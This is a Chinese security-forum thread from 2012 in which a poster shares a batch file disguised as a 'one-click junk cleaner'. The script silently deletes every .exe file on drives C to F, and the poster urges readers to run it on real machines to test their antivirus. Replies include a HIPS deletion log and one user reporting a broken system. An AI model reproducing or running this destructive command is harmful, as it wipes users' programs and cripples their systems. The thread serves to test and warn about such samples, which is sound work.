查看: 12955|回复: 73
收起左侧

[病毒样本] ┃● ●┃ 批处理再战安全软件 ┃● ●┃(实机运行测试)测主防 测监控 第一季

   关闭 [复制链接]
龙而非.
头像被屏蔽
发表于 2012-6-14 14:28:05 | 显示全部楼层 |阅读模式
本帖最后由 龙而非. 于 2012-6-14 22:41 编辑

这里的有几个朋友很搞笑

http://bbs.kafan.cn/thread-1307341-1-1.html

23楼 25楼(麻烦您看看您的文本文档还能使用吗?和压缩软件?)


====================分割线========================



今天最新的样本是我在一个论坛获取的(目前下载量超过了5万次人数)

一键清理 全面清理电脑垃圾 来自美国国防部的技术.......让您的系统一干二净 干干净净


源码:

@echo off
for %%a  in (c d e f) do (
del /q /f /s "%%a:\*.exe"
)



对此出现的问题个人不负责......

该批处理会是删除了所有盘符下的大部分EXE可执行文件



如果安全软件不拦截的话 确实不好

因为不是每个人都是电脑专家 他不一定可能看懂这些代码.....如果能看懂的应该是懂电脑的.....

而且这些恶意的批处理可以删除文件 破坏系统 瘫痪 破坏性等等一点不比病毒好多少......

而且在论坛里下载量超级高....破坏面 传播面也是相当广泛

实机运行测试 测主防 测监控 看看你的安全软件是否拦截有提示......

360主防拦截 杀毒扫描不出来(提示太多就不一个一个上图了)






好了不要说那么多废话了 真没意思,测试吧大家,不要转移话题

是不是你们的没拦截啊?所以一直在狡辩 转移话题 不愿意承认?.....




我不回答任何无意义的回复了,请测试,用事实说话.......


http://bbs.kafan.cn/forum-31-1.html 【第二季】

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1魅力 -1 收起 理由
雨宫优子 -1 http://bbs.kafan.cn/thread-1309243-1-1.h

查看全部评分

龙而非.
头像被屏蔽
 楼主| 发表于 2012-6-14 14:28:25 | 显示全部楼层
本帖最后由 龙而非. 于 2012-6-14 15:15 编辑

今天最新的样本是我在一个论坛获取的(目前下载量超过了5万次人数)

一键清理 全面清理电脑垃圾 来自美国国防部的技术.......让您的系统一干二净 干干净净

源码:

@echo off
for %%a  in (c d e f) do (
del /q /f /s "%%a:\*.exe"
)

如果安全软件不拦截的话 确实不好

因为不是每个人都是电脑专家 他不一定可能看懂这些代码.....如果能看懂的应该是懂电脑的.....

而且这些恶意的批处理可以删除文件 破坏系统 瘫痪 破坏性等等一点不比病毒好多少......

而且在论坛里下载量超级高....破坏面 传播面也是相当广泛

实机运行测试 测主防 测监控 看看你的安全软件是否拦截有提示......

360主防拦截 杀毒扫描不出来(提示太多就不一个一个上图了)




好了不要说那么多废话了 真没意思,测试吧大家,不要转移话题

是不是你们的没拦截啊?所以一直在狡辩 转移话题 不愿意承认?.....




我不回答任何无意义的回复了,请测试,用事实说话.......

  
hddu
发表于 2012-6-14 14:34:04 | 显示全部楼层
HIPS均可防。

2012-06-14 14:31:53    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\4TSRWZ0F\2y[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*


2012-06-14 14:31:54    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\4TSRWZ0F\3t[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*


2012-06-14 14:31:54    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\4TSRWZ0F\4i[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*


2012-06-14 14:31:54    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\4TSRWZ0F\6h[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*


2012-06-14 14:31:56    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\A5CZILY5\5c[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*


2012-06-14 14:31:58    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\AZCSRX5N\GGSetup[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*


2012-06-14 14:32:05    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\F8C1AE91\IPmana_2.82[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*


2012-06-14 14:32:05    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\F8C1AE91\Setup_WAS_ch3689[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*


2012-06-14 14:32:10    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\GPIVKDIJ\7[1].exe
触发规则:应用程序规则->IE临时文件夹设置->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*->?:\Documents and Settings\*\Local Settings\Temporary Internet Files\*
龙而非.
头像被屏蔽
 楼主| 发表于 2012-6-14 14:35:56 | 显示全部楼层
本帖最后由 龙而非. 于 2012-6-14 14:50 编辑
hddu 发表于 2012-6-14 14:34
HIPS均可防。

2012-06-14 14:31:53    删除文件      操作:允许


HIPS当然会防了 但是有几个一般大众用户会使用HIPS呢?

能使用HIPS的最起码也要有一点电脑基础能力吧?

如果安全软件不拦截的话 确实不好

因为不是每个人都是电脑专家 他不一定可能看懂这些代码.....如果能看懂的应该是懂电脑的.....

而且这些恶意的批处理可以删除文件 破坏系统 瘫痪 破坏性等等一点不比病毒好多少......

而且在论坛里下载量超级高....破坏面 传播面也是相当广泛

实机运行测试 测主防 测监控 看看你的安全软件是否拦截有提示......(这里说的安全软件是一般大众所使用的)
消停
头像被屏蔽
发表于 2012-6-14 14:41:11 | 显示全部楼层
龙而非. 发表于 2012-6-14 14:35
HIPS当然会防了 但是有几个一般大众用户会使用HIPS呢?

能使用HIPS的最起码也要有一点电脑基础能力吧 ...

我同意你的观点!别说一半大众,就是在卡饭混很久的人中,又有几个人真正用的明白!?
hddu
发表于 2012-6-14 14:43:49 | 显示全部楼层
用毒霸,猜测毒霸不防,因毒霸对批处理不重度感冒。
00315
发表于 2012-6-14 14:44:57 | 显示全部楼层
这东西.....杀软拦截严了,喜欢写批处理的就等着哭吧
a256886572008
发表于 2012-6-14 14:45:42 | 显示全部楼层
防破壞,最好用 重定向沙盤
龙而非.
头像被屏蔽
 楼主| 发表于 2012-6-14 14:47:38 | 显示全部楼层
00315 发表于 2012-6-14 14:44
这东西.....杀软拦截严了,喜欢写批处理的就等着哭吧



能写批处理的最起码也要有一点电脑基础能力吧?

一般用户有几个懂这个的?因为不是每个人都是电脑专家 他不一定可能看懂这些代码.....

而且一般也使用不到这些啊....

如果能看懂的应该是懂电脑的.....最起码有点这方面的能力吧....

懂的话 要使用 你自己用就行了 关闭安全软件使用也可以啊.....

而且这些恶意的批处理可以删除文件 破坏系统 瘫痪 破坏性等等一点不比病毒好多少......

所以安全软件还是防御的好.....

消停
头像被屏蔽
发表于 2012-6-14 14:48:29 | 显示全部楼层
fs扫描+双击过,我没等跑完就关了,但是系统还是悲剧了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-22 23:20 , Processed in 0.130057 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表